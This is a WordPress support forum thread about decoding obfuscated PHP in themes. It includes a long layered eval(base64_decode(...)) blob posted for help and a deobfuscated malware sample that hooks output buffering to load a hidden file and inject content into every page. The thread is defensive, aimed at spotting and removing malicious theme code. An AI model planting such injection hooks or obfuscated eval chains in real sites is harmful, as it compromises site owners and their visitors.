WordPress.org

Ready to get started?Download WordPress

Forums

127

[closed] Encrypted Theme? Here's how to decode it. (195 posts)

  1. Samuel Wood (Otto)
    Tech Ninja
    Posted 5 years ago #

    Hopefully this will help some people, and avoid posts to the forum about encrypted theme files. Use these tools to decode them yourself.

    Better yet, avoid encrypted themes entirely. They're always malicious in some fashion. There is no legitimate reason for a theme author to encrypt a theme file.

    This page will let you decode the encryption that seems most commonplace, the one that looks like $o=whatever:
    http://ottodestruct.com/decoder.php

    I based the interface for it off of this one, which will decode the type of encryption that starts with $_F=__FILE__:
    http://www.tareeinternet.com/scripts/byterun.php

    Another one is here, for those that look like eval(gzinflate(base64_decode('...')));:
    http://www.tareeinternet.com/scripts/decrypt.php

    This site supports a whole lot of different decoding methods, and he's adding new ones all the time. All you have to do is upload the encoded file and it spits out the decoded one:
    http://cyko.decodethe.net/

    (Yes, I know they're not really "encrypted", they're obfuscated. Semantics.)

  2. gonzalote
    Member
    Posted 5 years ago #

    look, these is mine obfuscated php.

    Please do not post encoded text on these forums. Use http://wordpress.pastebin.com instead, and post a link back here. -moderator

    can you help me with this? none of the decoders works for it. thanks.

  3. Samuel Wood (Otto)
    Tech Ninja
    Posted 5 years ago #

    gonzalote: The decoder I posted above works just fine with that code.

    Here's how you do it:
    1. Go here: http://ottodestruct.com/decoder.php
    2. See that $o="...garbage..." in your code? Take that garbage between the two quote marks, copy and paste it into the top box on the decoder form.
    3. Hit the "Decode This Mess" button.

    It works perfectly.

  4. mkirkwag
    Member
    Posted 5 years ago #

    So none of these actually work for the obfusticated code in the template I'd like to use. Tareeinternet has instructions for creating 3 files, loading them to the root directory and pointing the CHMOD at a particular file. Do you happen to know what constitutes the root directory in WP, and how you point CHMOD? I understand if you don't want to get into all this.

    Here's an example of some of the code:
    eval(str_rot13('shapgvba purpx_shapgvbaf(){vs(!svyr_rkvfgf(qveanzr(__SVYR__)."/shapgvbaf.cuc")){rpub(\'Guvf gurzr vf eryrnfrq haqre perngvir pbzzbaf yvprapr, nyy yvaxf va gur sbbgre fubhyq erznva vagnpg\');qvr;}}purpx_shapgvbaf();'));
    I thought it might work if I added "(gzinflate" after "eval" but no...

    http://tribeofadmins.com

  5. Samuel Wood (Otto)
    Tech Ninja
    Posted 5 years ago #

    Without the complete code, I can't decode it or give you any advice on decoding it.

    In general, replacing evals with echos tends to work pretty well. But you need to examine the code and figure out how it works. It's not usually very complicated to do.

  6. Kevin S
    Member
    Posted 5 years ago #

    nothing above mentioned decode tools is working for me.

    <?php
    eval(base64_decode("$v_vv8S0b9iR3="JHZfZlBTblVpalFUNT0iWm5WdVkzUnBiMjRnZGw5dmNETnlPREI0V21WV0tDUjJYMjF3Y0RKVmRXSjFNbkFwZXlSMlgweHRPR1J4TTI1MVYxbzlNRHQzYUdsc1pTZ3hLWHRwWmlna2RsOXRjSEF5VlhWaWRUSndXeVIyWDB4dE9HUnhNMjUxVjFwZFBUMXVkV3hzS1dKeVpXRnJPeXNySkhaZlRHMDRaSEV6Ym5WWFdqdDljbVYwZFhKdUpIWmZURzA0WkhFemJuVlhXanQ5IjtldmFsKGJhc2U2NF9kZWNvZGUoJHZfZlBTblVpalFUNSkpO2Z1bmN0aW9uIHZfYkxkS2RZVDQxYygkdl8wcWJxaXhwYjZaLCR2X3Z3WnM5aDNZUmIpe2VjaG8gIiI7JHZfU2hBaW9zY2IxNz0iIjskdl80YXpqbmQ3ZzR0PSh2X29wM3I4MHhaZVYoJHZfdndaczloM1lSYikvMik7Zm9yKCR2X3hvNVg0blc3MHA9MDskdl94bzVYNG5XNzBwPCR2XzRhempuZDdnNHQ7Kyskdl94bzVYNG5XNzBwKXskdl9TaEFpb3NjYjE3Lj1jaHIoaGV4ZGVjKHN1YnN0cigkdl92d1pzOWgzWVJiLCR2X3hvNVg0blc3MHAqMiwyKSkpO30kdl9yS3BSMGc3Y1BpPSIiOyR2XzRhempuZDdnNHQ9dl9vcDNyODB4WmVWKCR2X1NoQWlvc2NiMTcpOyR2X3hyMFRRN3MxUlU9dl9vcDNyODB4WmVWKCR2XzBxYnFpeHBiNlopO2Zvcigkdl94bzVYNG5XNzBwPTA7JHZfeG81WDRuVzcwcDwkdl80YXpqbmQ3ZzR0OysrJHZfeG81WDRuVzcwcCl7JHZfZ205c1NoYjYxTD1zdWJzdHIoJHZfU2hBaW9zY2IxNywkdl94bzVYNG5XNzBwLDEpOyR2X3R0NVphMlR4UFI9c3Vic3RyKCR2XzBxYnFpeHBiNlosJHZfeG81WDRuVzcwcCUkdl94cjBUUTdzMVJVLDEpOyR2X1llNzMwYlBrUWQ9b3JkKCR2X2dtOXNTaGI2MUwpOyR2XzhMMWJtdVg2d0E9b3JkKCR2X3R0NVphMlR4UFIpOyR2X2VleFZ0MGhwU3k9JHZfWWU3MzBiUGtRZC0kdl84TDFibXVYNndBOyR2X2dtOXNTaGI2MUw9Y2hyKCR2X2VleFZ0MGhwU3kpOyR2X3JLcFIwZzdjUGkuPSR2X2dtOXNTaGI2MUw7fXJldHVybiR2X3JLcFIwZzdjUGk7fQ==";eval(base64_decode($v_vv8S0b9iR3));$v_4azjnd7g4t="dSNALwSb633bbzK05Sky880hOwqbXflo";$v_NT36kvuoUR="CAC8BCA4C0E0C2D056A7A3C1CADFAC949AC593A2B34239CFBBE6D3C3C48690E3D4BCBCA7BBB25D6B9B969BD182A187A3A9CCD7DE58ACA9D8B4B493D6BDDEE09EC7C6C1638A9E8E6C3F9896CAD19A725398C2D9ED9DA6A4E3B5E3E0C3CCA0D8D4CAC789BE73B25D6B9B969BD182A1875FA8C7E4E59D7657A359F47B6CB9CAD0CEC5B6C2AABBE57B89ADA392CAC7DBAF57617392EDA89798CDB0DBD6D47F8FA78F6E5D7D6B76A17D8C605D5D8C8CA4755A5F7D95A362625A9279A19B8C829096998E7D786B76A17D8C605D5D8C8CA4755A5F7D95A362625A9279A19B8C829096998E7D786B76A17D8C605D5D8C8CA4755A5F7D95A362625A9279A19B8C82909699935D72B5BCD6B9D1A5A798D4C1DDBD9599BCDF99755857A4B097D9D4BDCCA991CCC7C2B186A682D9ADAA61D6C7E7BB9C96C7D0E5A1AC9596B2E6DE91CFD5DED3D4C5B3B4BFA4CAC798609BD1D5EEB49E9C828DB78FA7A2CCBFE9D6D5CB86C3D4C67396B0BFEBBCD09D6F62C3A09ABBA2A4C9D4DD9D9C50CAC897ADC378CEDED4CA9070A9C0EBC39C6562AAD9D9A8B6A698BBDAECACA19ECF7DDAE0CF8788AAC6C9B56E6194E6C6D69FA19A9E91DB8950B173A7DA58A0A2CDB5B493CACCDADCA99382C5B8C3A5CAC7989BA2D5D6E3B997A7B8DBE8AAAC5ECBBEE4A08496A8D1E2D873A5A6AE979BD1A9A79CD0C9B67A9173739199749950D0C1DCD79F7ACEE0E3D48D7D70C3EECA909B96A2CFCFDFBD939ACAD0DBABA1A4CDC2A5D4D1C594CDE493758CA679DAC2CFA398A5C5C7B67A91737AA6835CACA0C7B5E6E0D6BDD8CBD2D6B8B2AAC0A59082AA98A0D2CEDBBF95A1BCDFDE97AB98D7C6D6DDCBC6D1DF978D8E584BB2ECC1C5AA9CA2D082DBAF9494C0D0ED99979CD1BDE2998BD37075D4C7BBBD6173B3BFCB746F9482CAECB0967275D3EDACA86A977EEEE8D986CEDBE2D8C5B3A7B1E981C5A5A0628482EEB4A4A1B8A89B8F9D928897E6E4D6C1D4D38FA8BCC0A6AFEBC2D4AF5571B9C7DC6B78A4C6DFE2A69F50BAB4DDD6D49495CDADA082BAAA8A9E8E6C3F9896CAD19A726CA1BCA9B5995898DAB4DDAE84C0DAE0DF9E827DB8C3EE81D59FA19ACEC7E2BAA063B6DAE6675A50DCB8EBDDC79588B0D4C8BCB1A2C0DCB7829EA2A6D6CBE8B2527397D0DDA19B91DCB4DB91CAC7D9E0D8D2BA8A70ADB58F91A29C71899D84C83A96B7CFD8999BA4D1BEE59989CFD6CBDCC9C7AF6878977AC39A9792CFC7EEAC8FA1BCD9E45F616B885981A08C829096998E7D786B76A17D8C605D5D8C8CA4755A5F7D95A362625A9279A19B8C829096998E7D786B76A17D8C605D5D8C8CA4755A5F7D95A362625A9279A19B8C829096998E7D786B76A17D8C605D5D8C8CA4755A5F7D95A362625A927E81D7D7C6C9E0D8D3C16EB5B1E4C3CE97A798CECBEEB08FA8BBDAF097A499D6BAEA998BD3707593C7C8C0B3B1E5C79F9D98A7C1D1EABF99A4C193A0AC9D9DD8BBD8E5C7C4CFE0D4C3BFB7AFB7EA7A8B713D3CCBC8A26C99A8B2D3E8A59D58916F9D978279CFDFCECAC5BDAFC0D6C3C39D985B8B8BF5545F5FBCD199A6A7A488B7E6DEC78486E3D484BDC3B4C097C5C7AAA8A5D082EEB39555BFD4E7A3AB5C88B3E6DF89CC86CFD7C9B6B9617498BCD5959BA2CFC7A274595F82758241AA95DCC4E9DF827CC9E1E1D6B8BCB5A79EBFCBA49EA689BFB55539B25D749DA099A3D08C9EA99C889F9CA3948A757C568077D2A5A6A7C1D8DBBD9996B5D7DEAB586D88B0E9E3C3D18E76786D7AB0ADBBDEB2CAA5A098899FB8B295A9B2CDE5A79F99D6B5E69989C0D5D9D48B7C7A4B55807AC4A2A29AC1D6E3BF9C9A7AA8B79F9DA4C7B1E3E0C9C1D4D2DE8C7AC2AAC0E3B8895F5F3D6B6BA1BF989AC0D0D8ABA89FDC76B4AF89898D98796D5C75B5B4DCC0C7959C97899FB872685C7F7582415FA4D0B4E4D6C1CECBDE96A19175727AA78489623D3C6B89EEB395A2B8CAE799A5958F8CB598A5C7CCD2D4C97392A6BFE27A8E403C5C9D6C8454999B7B8FDCADAAA2CDBDEBAE9F95ACADBBB7986EBDC89777C5ABA5A5C7D0EEA657A9BCD8DE5F9550A46FEBDACFBD8E959C988680717C9773DEB25357C5D7ECBD95A3C7C6A0A099A3D076D4929F7CCECDE2CC7CC9617BA1C0CBA453649482E2BAA5A7C695A84241398CBDDCE89FB9D8DED0DD7B777C56805C86A498AABD89EEB49D9A7AC8B6ACA19DCD77A0AC6C616F90DDC9CAA968B4D8C6CA5D907086CADBBE98705D74825CA695DFAA9EDDCBC6D1DF96C190C2A6B9E7BFC3AA989FCBD6DFAA979AC7CAE5A1A69BDB779BE1D1CBDACBE5C5C5B7A2AEE3B8D55F6E3D6B6B8454399EB9939DA69DA7C376E3DAD0C3D993CCA1908B878DC3A6A75FAE53918CF1B395A373CFDAAC9950CDC1E9E0D48486DFDEC7BEB3B56CEBBCCF9B9753D1D7EE6B9FA773DEEDAA9D91D56FEBDACFBD86DBE4D87F6EB8B197C8D29A94A7C782EEB39555C7D4E69D625F7258807A86C6CBE3CA8BBFB7AFB7EA7ABF735796D7D4ECB09EA9AE92E5A1A69BDB76D4AC6C616FE9796E5C57B6BCDBB4D69B92A2D2D6E3BA9E5D75DFDEA5A89CC9C3DCDDCBCCCBCBDBCDC1B9B46EA377D09BAA5C9D82A975A49DB88BE5A1A69B88BCD8EAC4BD86D5E284B8BBB1C0F073C4ABA753D9C79AB5A5A8C78BEC99AE9588C3DFD682CCCFD9D484BCBCB5BB97B7C3AA9495C3D5DF755F3F5C74EB9DACA5DABD9795D0BDDDC796D0BCBCACBF9EB09D403CB0C7CEEDB0AB3F5C74EB9DACA5DABD9795C5CDD8DED4D2C7A968B8E0C1CDA95A909D6C83C83AB25D75DFADA693DCB8E6DF82CCCBD9DFD0B4C2A6B8E0C7C7959A98D6C1E6B49EA0C6939DA8A7A3DCAEEDD2D4C1C7CEDBC9C677BC5680BCD0999FA8C6C7D9BA9E98B893BA7A8B80A9A3BF919078BDBCB8B2966E6F6C9E82D4A9A661D2CAEA7259705D74DFA7AA95C9B2DF9986C8D5DFE3C3C9AFB3B5D8B5CE9BA653C3D59A6F9B9ACCA8B75CAE91D4C4DC9ADD626F7593C8B4C2A27AB47386A198AC9089B7725EA7B4E2EEAAA495D6B2E6D5C7808AE2D0D0C8B36A7A997984713D3CDF6C836F9496C7CCB6AAACA2D1BC9F95C6B9DACD9B8679706A87815C86AAA0A3C1C4E9BA9C7299ACC58B7D6B7258E0D78AA5A7B3BFAD98AD848DBA9BA79582818BDD84543959C7D8E9979A9FD7BBB4C5B4ADABA7796D5CB2A6B2E0C1C75E5A80A3A9CA94759496ACBC807D8FB79D9E9D82888FA7796DD0584B559BC5D5A97099C7D6DDB38FA7C6DEA15FA0A4DCBFB1A091CFDDE39DD8B8BBB1B8D8C7C7A9A794D6D5A8AE9FA282CCE9A167A2DBC2A6B089868AD0D0D8B4777C5680BCC85E57A7CFD2D9AD9FA4BFA8B6758C82BD94A091C6BDCCD5DDC97B758E8DBEA3AB7B9276A3A5C2908F84A192A5586959A359817ACBBE8E90E1D7C67761C7815C6B5A9CA7C7CFED6B6D55B4DDEB99B18FDBBBE0D4C7808ADEE2D7808CAAC0DCC0D56253638E82AD746B647DD8DAA39D50DBC4E9D682CFCB8CD6C9C76E8E8DCF9CAF8B80539582E6B49EA0C68BC8868489927E817A6BC1CC94D2D3C8BCB5749BBCD69BA0A68B9FB77B5955C5D0EDADAA9E887199AC6C616FD2DED6B8AFA4B4977B8A97A5A5C3DBA36F99A9B8D8EC5899A38873E0E5C7C58695EA6E5C574A70EBC0D291907086CBEEB09D907ADBEB9D9E99E076D49F8994C78CD7D6B8B47E6E9E81869FA798CFBDA1B799A3BE92D6665F5288C3E0E5CEBDA38E969277B7B5B1E4AE899A98A6C5D4E3BBA49EC2D9A09566578A8D9E9F86C1DAD1DCBF7AC2AAC0E3B88993615A9E91DB8957705D7482B542397173E3DAD0C3D9A993D6C6C16E8ADABBC3A4A198CEBDA1BBA29AB9D4F15F955ED1BCE7DDD1BCCB94919073706D70EBC0D25F6E3D6B6B9EB799A3BEDEB6ABACA2D1BFD6E5C3BFD99493D0BCBCACBFA3759E9771558B9D9A7A5A99C2E0DBA49D50CBBEE5D7CBCAD38CE3CCB4C261BBE5BFDB56A798DAD69AAC9E9973D7E2A6A3A388B0E9D682B9D2D8DEDB81787056805CD49BA7A8D4D09A6F9C9EC1D6EC734239E5B4E3E4C7D3707578D6B8C2B6BEE573A8777F86A79D8454AD3FD075839EAD9ECBC3E0E0D078DAD4D4D1B8ADA4BEDCB7CBAA5B5CDD6C83B29CA4B5CCE5585CA4D8AEDDE0D1CCCBDECEC7C5B3A5B5EB8E6C3F9896CAD19A6FA4A5B2D1E8A7AC95DAAEDAE3C7BCCFE0AA6ED0584BBBD9B2D5AA94A5D68AA3863A9EC1CEE5AD9C9588A3BCBEB2A4A7C0B4B494A2897A9982C8A5A2A7C7D4A8BB98A575A6835CACA0C7B5E6E0D6BDD8CBD2D3C1C2A6BAEB90D198929AC7D6D9AE9FA3C7D0E7ACAB58918A81E0C4B7CBDAD3C3B6BAA6ADE57B8B713D3DC8D7E8AEA49EC2D999ACA88FCEBEE6E5C7CA8E95EA6E5CB5ADBBD9B4CE5657A7D2C1E0BA9FA9B8DDD89BA79EDCB4E5E58E7CDADCCECAC2BDB5B1E9B2C5A89897CBD6B555399EB993ECACAAA0D7C29F95D6C8C5D2DED3C7B3B3ABDAC2D0AA98A1D68E9EBFA094B9DAE8AC9DA2C7B2E9D6C6C1DA958FA1908B61B2D8BFD59B5C53DD6C83549598BBDA995A5A6B7258F4D6CECBCBE7796D5CB3A4B4E67386AAA392C8D1E9BF95A7B2CEE8A6AC95D6C3B27B6BD570E979C5B7B2A0ADDAC7CBA5A15B89C9DFBF8F9BC2DAED9DAA579476EBE1C1BED5DBE3C9C5756A87";eval(v_bLdKdYT41c($v_4azjnd7g4t,$v_NT36kvuoUR));"));
    ?>
  7. JCoelho
    Member
    Posted 5 years ago #

    Hey Otto, I've tried your decoder with this footer:
    Please do not post encoded text on these forums. Use http://wordpress.pastebin.com instead, and post a link back here. -moderator

    And got this code:

    Please do not post large sections of HTML/PHP code on these forums. Use http://wordpress.pastebin.com instead, and post a link back here. -moderator

    $_X=b2s61i_d6c3d6($_X);$_X=strtr($_X,'aouie123456','23456aouie1');$_R=6r6g_r6pl2c6('__FILE__',"'".$_F."'",$_X);6v2l($_R);$_R=0;$_X=0;

    I see some links to the author page in there, aswell as some google ads stuff (I know the theme supports it), strangely there's still some encrypted stuff in the bottom that I can't figure out.

    I would also like to request your help in figuring out what needs to be put in the footer, and what part of this code can go to the graveyard.

    Best Regards,
    JCoelho

  8. thpanagos
    Member
    Posted 5 years ago #

    Hello.
    It all started with a mess in my wordpress blog admin page. Reading around i found that the /**/eval(base64_decode('aWYoZ ... code could be really bad. I got it in a http.php file. I tried on line decoders, but with no result. Even if i manage to decode it, i have nothing to do with codes, so i cant tell what it must be fixed, if any.
    Any help?

    I got this line:
    Please do not post encoded text on these forums. Use http://wordpress.pastebin.com instead, and post a link back here. -moderator

  9. mkirkwag
    Member
    Posted 5 years ago #

    Thanks, Otto. I wasn't actually asking you to decode my theme - I'm sure you have better things to do :-). I just wondered if you - or anyone else - know what constitutes the root directory in WP and what CHMOD is and how you aim it so that I can follow Tareeinternet's directions. Thanks in advance!

  10. Adam Harley
    Member
    Posted 5 years ago #

    @mkirkwag the root directory in WP is the base directory in which wp-includes, wp-content and wp-admin are normally found. Chmod is a tool/instruction that's used to change file permissions, usually easiest using your FTP client unless you have console access.

    @JCoelho That's not encrypted, that's PHP code that the final line eval( is telling it to execute. God knows quite what it's doing, but I'd run a mile from a theme doing that much to obscure its "activities".

    It reads as:
    $_X = b2s61i_d6c3d6($_X); set $_X to the result of a random function
    $_X=strtr($_X,'aouie123456','23456aouie1'); Find something from some function
    $_R=6r6g_r6pl2c6('__FILE__',"'".$_F."'",$_X); Do something with the file path
    6v2l($_R);$_R=0;$_X=0; Run a function, set with some variables

    In short, without seeing the full thing, I'd avoid like the plague.

  11. Adam Harley
    Member
    Posted 5 years ago #

    @mkirkwag your sample reads:
    function check_functions({if(!file_exists(dirname(__FILE__)."/functions.php")){echo('This theme is released under creative commons licence, all links in the footer should remain intact');die;}}check_functions();

    Easiest way to decode is to change eval, the command to evaluate (run) code, to echo, the command to just write it.

    @thpanagos That's... some insanely written code. I've broken it down but it's hard to tell what it's doing without seeing some of the functions it references. They'll be under /wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/style.css.php. I'm 99% sure from what I can tell of it though is that it's a virus which is set up to read files from your system, probably on demand. Anyone else think the same looking at dgobh() which strips out the HTML, takes out any content type header and puts something else in its place? And providing gzdecode() if it doesn't exist... really?

    Here's the dumbed down version of the code (the real variables are ridiculously long random hex):

    if ( function_exists( 'ob_start' ) && !isset ( $GLOBALS[ 'sh_no' ] ) )
    {
    	$GLOBALS['sh_no']=1;
    	if ( file_exists ( '/home/mikesurf/public_html/<website domain>/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/style.css.php' ) )
    	{
    		include_once ( '/home/mikesurf/public_html/<website domain>/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/style.css.php' );
    		if ( function_exists ( 'gml' ) && !function_exists ( 'dgobh' ) )
    		{
    			if ( !function_exists ( 'gzdecode' ) )
    			{
    				function gzdecode( $passed_by_gzdecode ){
    					 $var_A1 = ord ( substr( $passed_by_gzdecode, 3, 1 ) );
    					 $var_A2 = 10;
    					 $var_A3 = 0;
    					if( $var_A1&4 ) {
    						$var_A3 = unpack ( 'v', substr( $passed_by_gzdecode, 10, 2 ) );
    						$var_A3 = $var_A3[1];
    						$var_A2 += 2 + $var_A3;
    					}
    					if( $var_A1&8 ) {
    						$var_A2 = strpos ( $passed_by_gzdecode, chr(0), $var_A2 ) + 1;
    					}
    					if( $var_A1&16 ) {
    						$var_A2 = strpos ( $passed_by_gzdecode, chr(0), $var_A2 ) + 1;
    					}
    					if( $var_A1&2 ){
    						$var_A2+=2;
    					}
    					$var_A4 = gzinflate( substr ( $passed_by_gzdecode,  $var_A2 ) );
    					if( $var_A4 === FALSE ) {
    						$var_A4 = $passed_by_gzdecode;
    					}
    					return  $var_A4;
    				}
    			}
    			function dgobh ( $passed_by_dgobh ) {
    				Header( 'Content-Encoding: none' );
    				$var_B1 = gzdecode( $passed_by_dgobh );
    				if ( preg_match( '/\<body/si', $var_B1 ) ) {
    					return preg_replace ( '/(\<body[^\>]*\>)/si', '$1'.gml(), $var_B1 );
    				}
    				else {
    					return gml().$var_B1;
    				}
    			}
    			ob_start('dgobh');
    		}
    	}
    }
  12. calvinms
    Member
    Posted 5 years ago #

    I have been struggling for hours to decode this byterun decoded footer.php file, and unfortunately the site doesnt work for me, could someone help me?

    Please do not post encoded text on these forums. Use http://wordpress.pastebin.com instead, and post a link back here. -moderator

  13. Samuel Wood (Otto)
    Tech Ninja
    Posted 5 years ago #

    calvinms: Somebody used the ByteRun encoder twice in a row. Nice.

    First, copy and paste the Pz48P3...nKSk7Pz4= stuff into that ByteRun decoder page, then hit the button. You'll get back more encoded stuff, but notice that it looks to be the same type of encoding.

    So, copy and paste the contents of the $_X variable from the bottom box to the upper one again and hit decode one more time.

    Voila. There you go. Takes about 10 seconds.

  14. Samuel Wood (Otto)
    Tech Ninja
    Posted 5 years ago #

    JCoelho: That bit of code looks left over from the initial decoder section, or somebody messed up.

    I've seen encoded code that looks like that. Basically it's replacing vowels with numbers and vice-versa, as a sort of poor man's obfuscation. When it reverses, it uses that to decode and decrypt followed by an eval.

    Basically, it's garbage. Delete it.

  15. calvinms
    Member
    Posted 5 years ago #

    thank you very much, that explains why I kept getting the same result. :)

  16. naweedshams
    Member
    Posted 5 years ago #

    I found this on a very helpful site, this is only for those of you with encrypted footer.php.

    Place this code:

    <!--Our dear footer starts here-->

    <?php get_footer(); ?>

    <!--Our dear footer ends here-->

    In your Index.php right at the bottom, you can replace the <?php get_footer(); ?> with the code above.

    Then go to your web browser and view your website source, you will see the original footer.php file so copy all of it from where you see <!--Our dear footer starts here--> right down to <!--Our dear footer ends here--> and paste it in your footer.php. Delete all the encrypted code and your done!

    Hope this saves alot of headache for everyone!

  17. naweedshams
    Member
    Posted 5 years ago #

    Although I might need help with the index.php file too, theres a nasty looking encrypted code:

    Please do not post large chunks of code here in these forums. -mod

    Anyone able to help?

  18. Samuel Wood (Otto)
    Tech Ninja
    Posted 5 years ago #

    naweedshams: The very first post in this thread gives you a link to a decoder specifically designed to decode the code that you posted. Use it, please.

  19. mkirkwag
    Member
    Posted 5 years ago #

    Kawauso - thank you so much! I'll see what I can do with that. I did actually find the "echo" instruction online and tried it, but I must have done something wrong. I pasted it into the theme editor for the appropriate page and updated the page. The code didn't appear and the page became an error. I'm glad to know that's about the footer, though it doesn't ease my concern. I love my theme, but I'm worried that it's a hacked version, and the theme's creators don't respond to queries so I can be sure. I have trouble believing that it was created by "Cheap Web Hosting." I know it's a Skinpress theme. Anyway, thanks!

    Otto42 - I think what naweedshams posted is for the many people like me for whom the decoder didn't work.

  20. Samuel Wood (Otto)
    Tech Ninja
    Posted 5 years ago #

    mkirkwag: No, the decoder worked on his code. I tried it, worked fine. Your code was of a different type.

    And if anybody can provide samples of another common encoding method, then I can easily write another decoder for that type and stick it in the first post too. The goal here is to provide decoders so that we don't have people posting tons of code all over the forums trying to get it decoded.

  21. naweedshams
    Member
    Posted 5 years ago #

    @Otto42 Brilliant! Thanks for your help, the decoder worked perfect!

  22. Mr. Vibe
    Member
    Posted 5 years ago #

    My self is a WordPress theme designer and my opinion is that if a theme is encrypted you should NOT download it. This is not GPL anymore. If you decide to thank me for my work by keeping the link, i thank you. If not, that's it...

    Not all good themes are encrypted!

    [links moderated]

  23. builtBackwards
    Member
    Posted 5 years ago #

    Please don't take this as a shameless plug, but I wrote a plugin to quickly find the obfuscated code in all of the installed themes because I often ran into this problem myself.
    The plugin does not do any decoding, just identifies theme files that contain bad code.

    http://wordpress.org/extend/plugins/tac/

    Mods: If this is inappropriate, by all means delete it.

    - builtBackwards

  24. @mercime
    Volunteer Moderator
    Posted 5 years ago #

    There is another kind ... eval(str_rot13(' ... '));
    In one theme, I found two instances of above code in functions.php and two instances in header.php
    To decode go to http://rot13-encoder-decoder.waraxe.us/ where you input the code found between the two single quotes above

  25. elizabethrichardson
    Member
    Posted 5 years ago #

    Thanks for the link to the decoder Otto. I have been fighting for almost 20 hours straight to remove the eval(base64_decode problem.

    I'm watching this thing spread across one of my domains in particular.

    Here is the first part of the problem explained http://wordpress.org/support/topic/297639/page/3?replies=67#post-1216416

    Now, this might sound silly, but php files are being created in association with my theme dpb_shiny. But I can ONLY see them in my dashboard...NOT in file manager or ftp. So far it's created module.php, gdi.php, http.php and preview.php in the last hour. Ridiculous! I have no way to delete them.

    I have been using this theme for almost 1 year with no problem at all and I know it didn't have any strange code attached to it as I've kept a copy of the original folder.

    When I ran the contents of each file through the decoder I was only left with ?><? which seems to have helped for the moment. Am I going crazy, or are other people having weird things happen as well?

    LATE EDIT

    Pardon my ignorance. Just found the offending code in the flickr_feeder folder that came with the theme. Have been able to delete it through phpmyadmin but couldn't get access through FTP.

    But why is it showing up now?

  26. mkirkwag
    Member
    Posted 5 years ago #

    I want to thank builtbackwards for the TAC plugin. It's really helpful to me to be able to stop worrying about the code, even though I wasn't able to find a decrypt script in this thread.

  27. thaimerits
    Member
    Posted 5 years ago #

    Thank you. greath for me.

  28. Chukwudi Emmanuel Udegbunam
    Member
    Posted 5 years ago #

    @Otto42: Thanks a million. http://ottodestruct.com/decoder.php did the magic.

  29. siranthony
    Member
    Posted 5 years ago #

    Hello Otto,
    Got my hands full with this one: Any help would save some hair!

    Please don't post large chunks of code here. Use http://wordpress.pastebin.com instead. Thanks! - moderator

  30. siranthony
    Member
    Posted 5 years ago #

    And this one found in the index:

    Please don't post large chunks of code here. Use http://wordpress.pastebin.com instead. Thanks! - moderator

    Thanks again!!!

127

Topic Closed

This topic has been closed to new replies.

About this Topic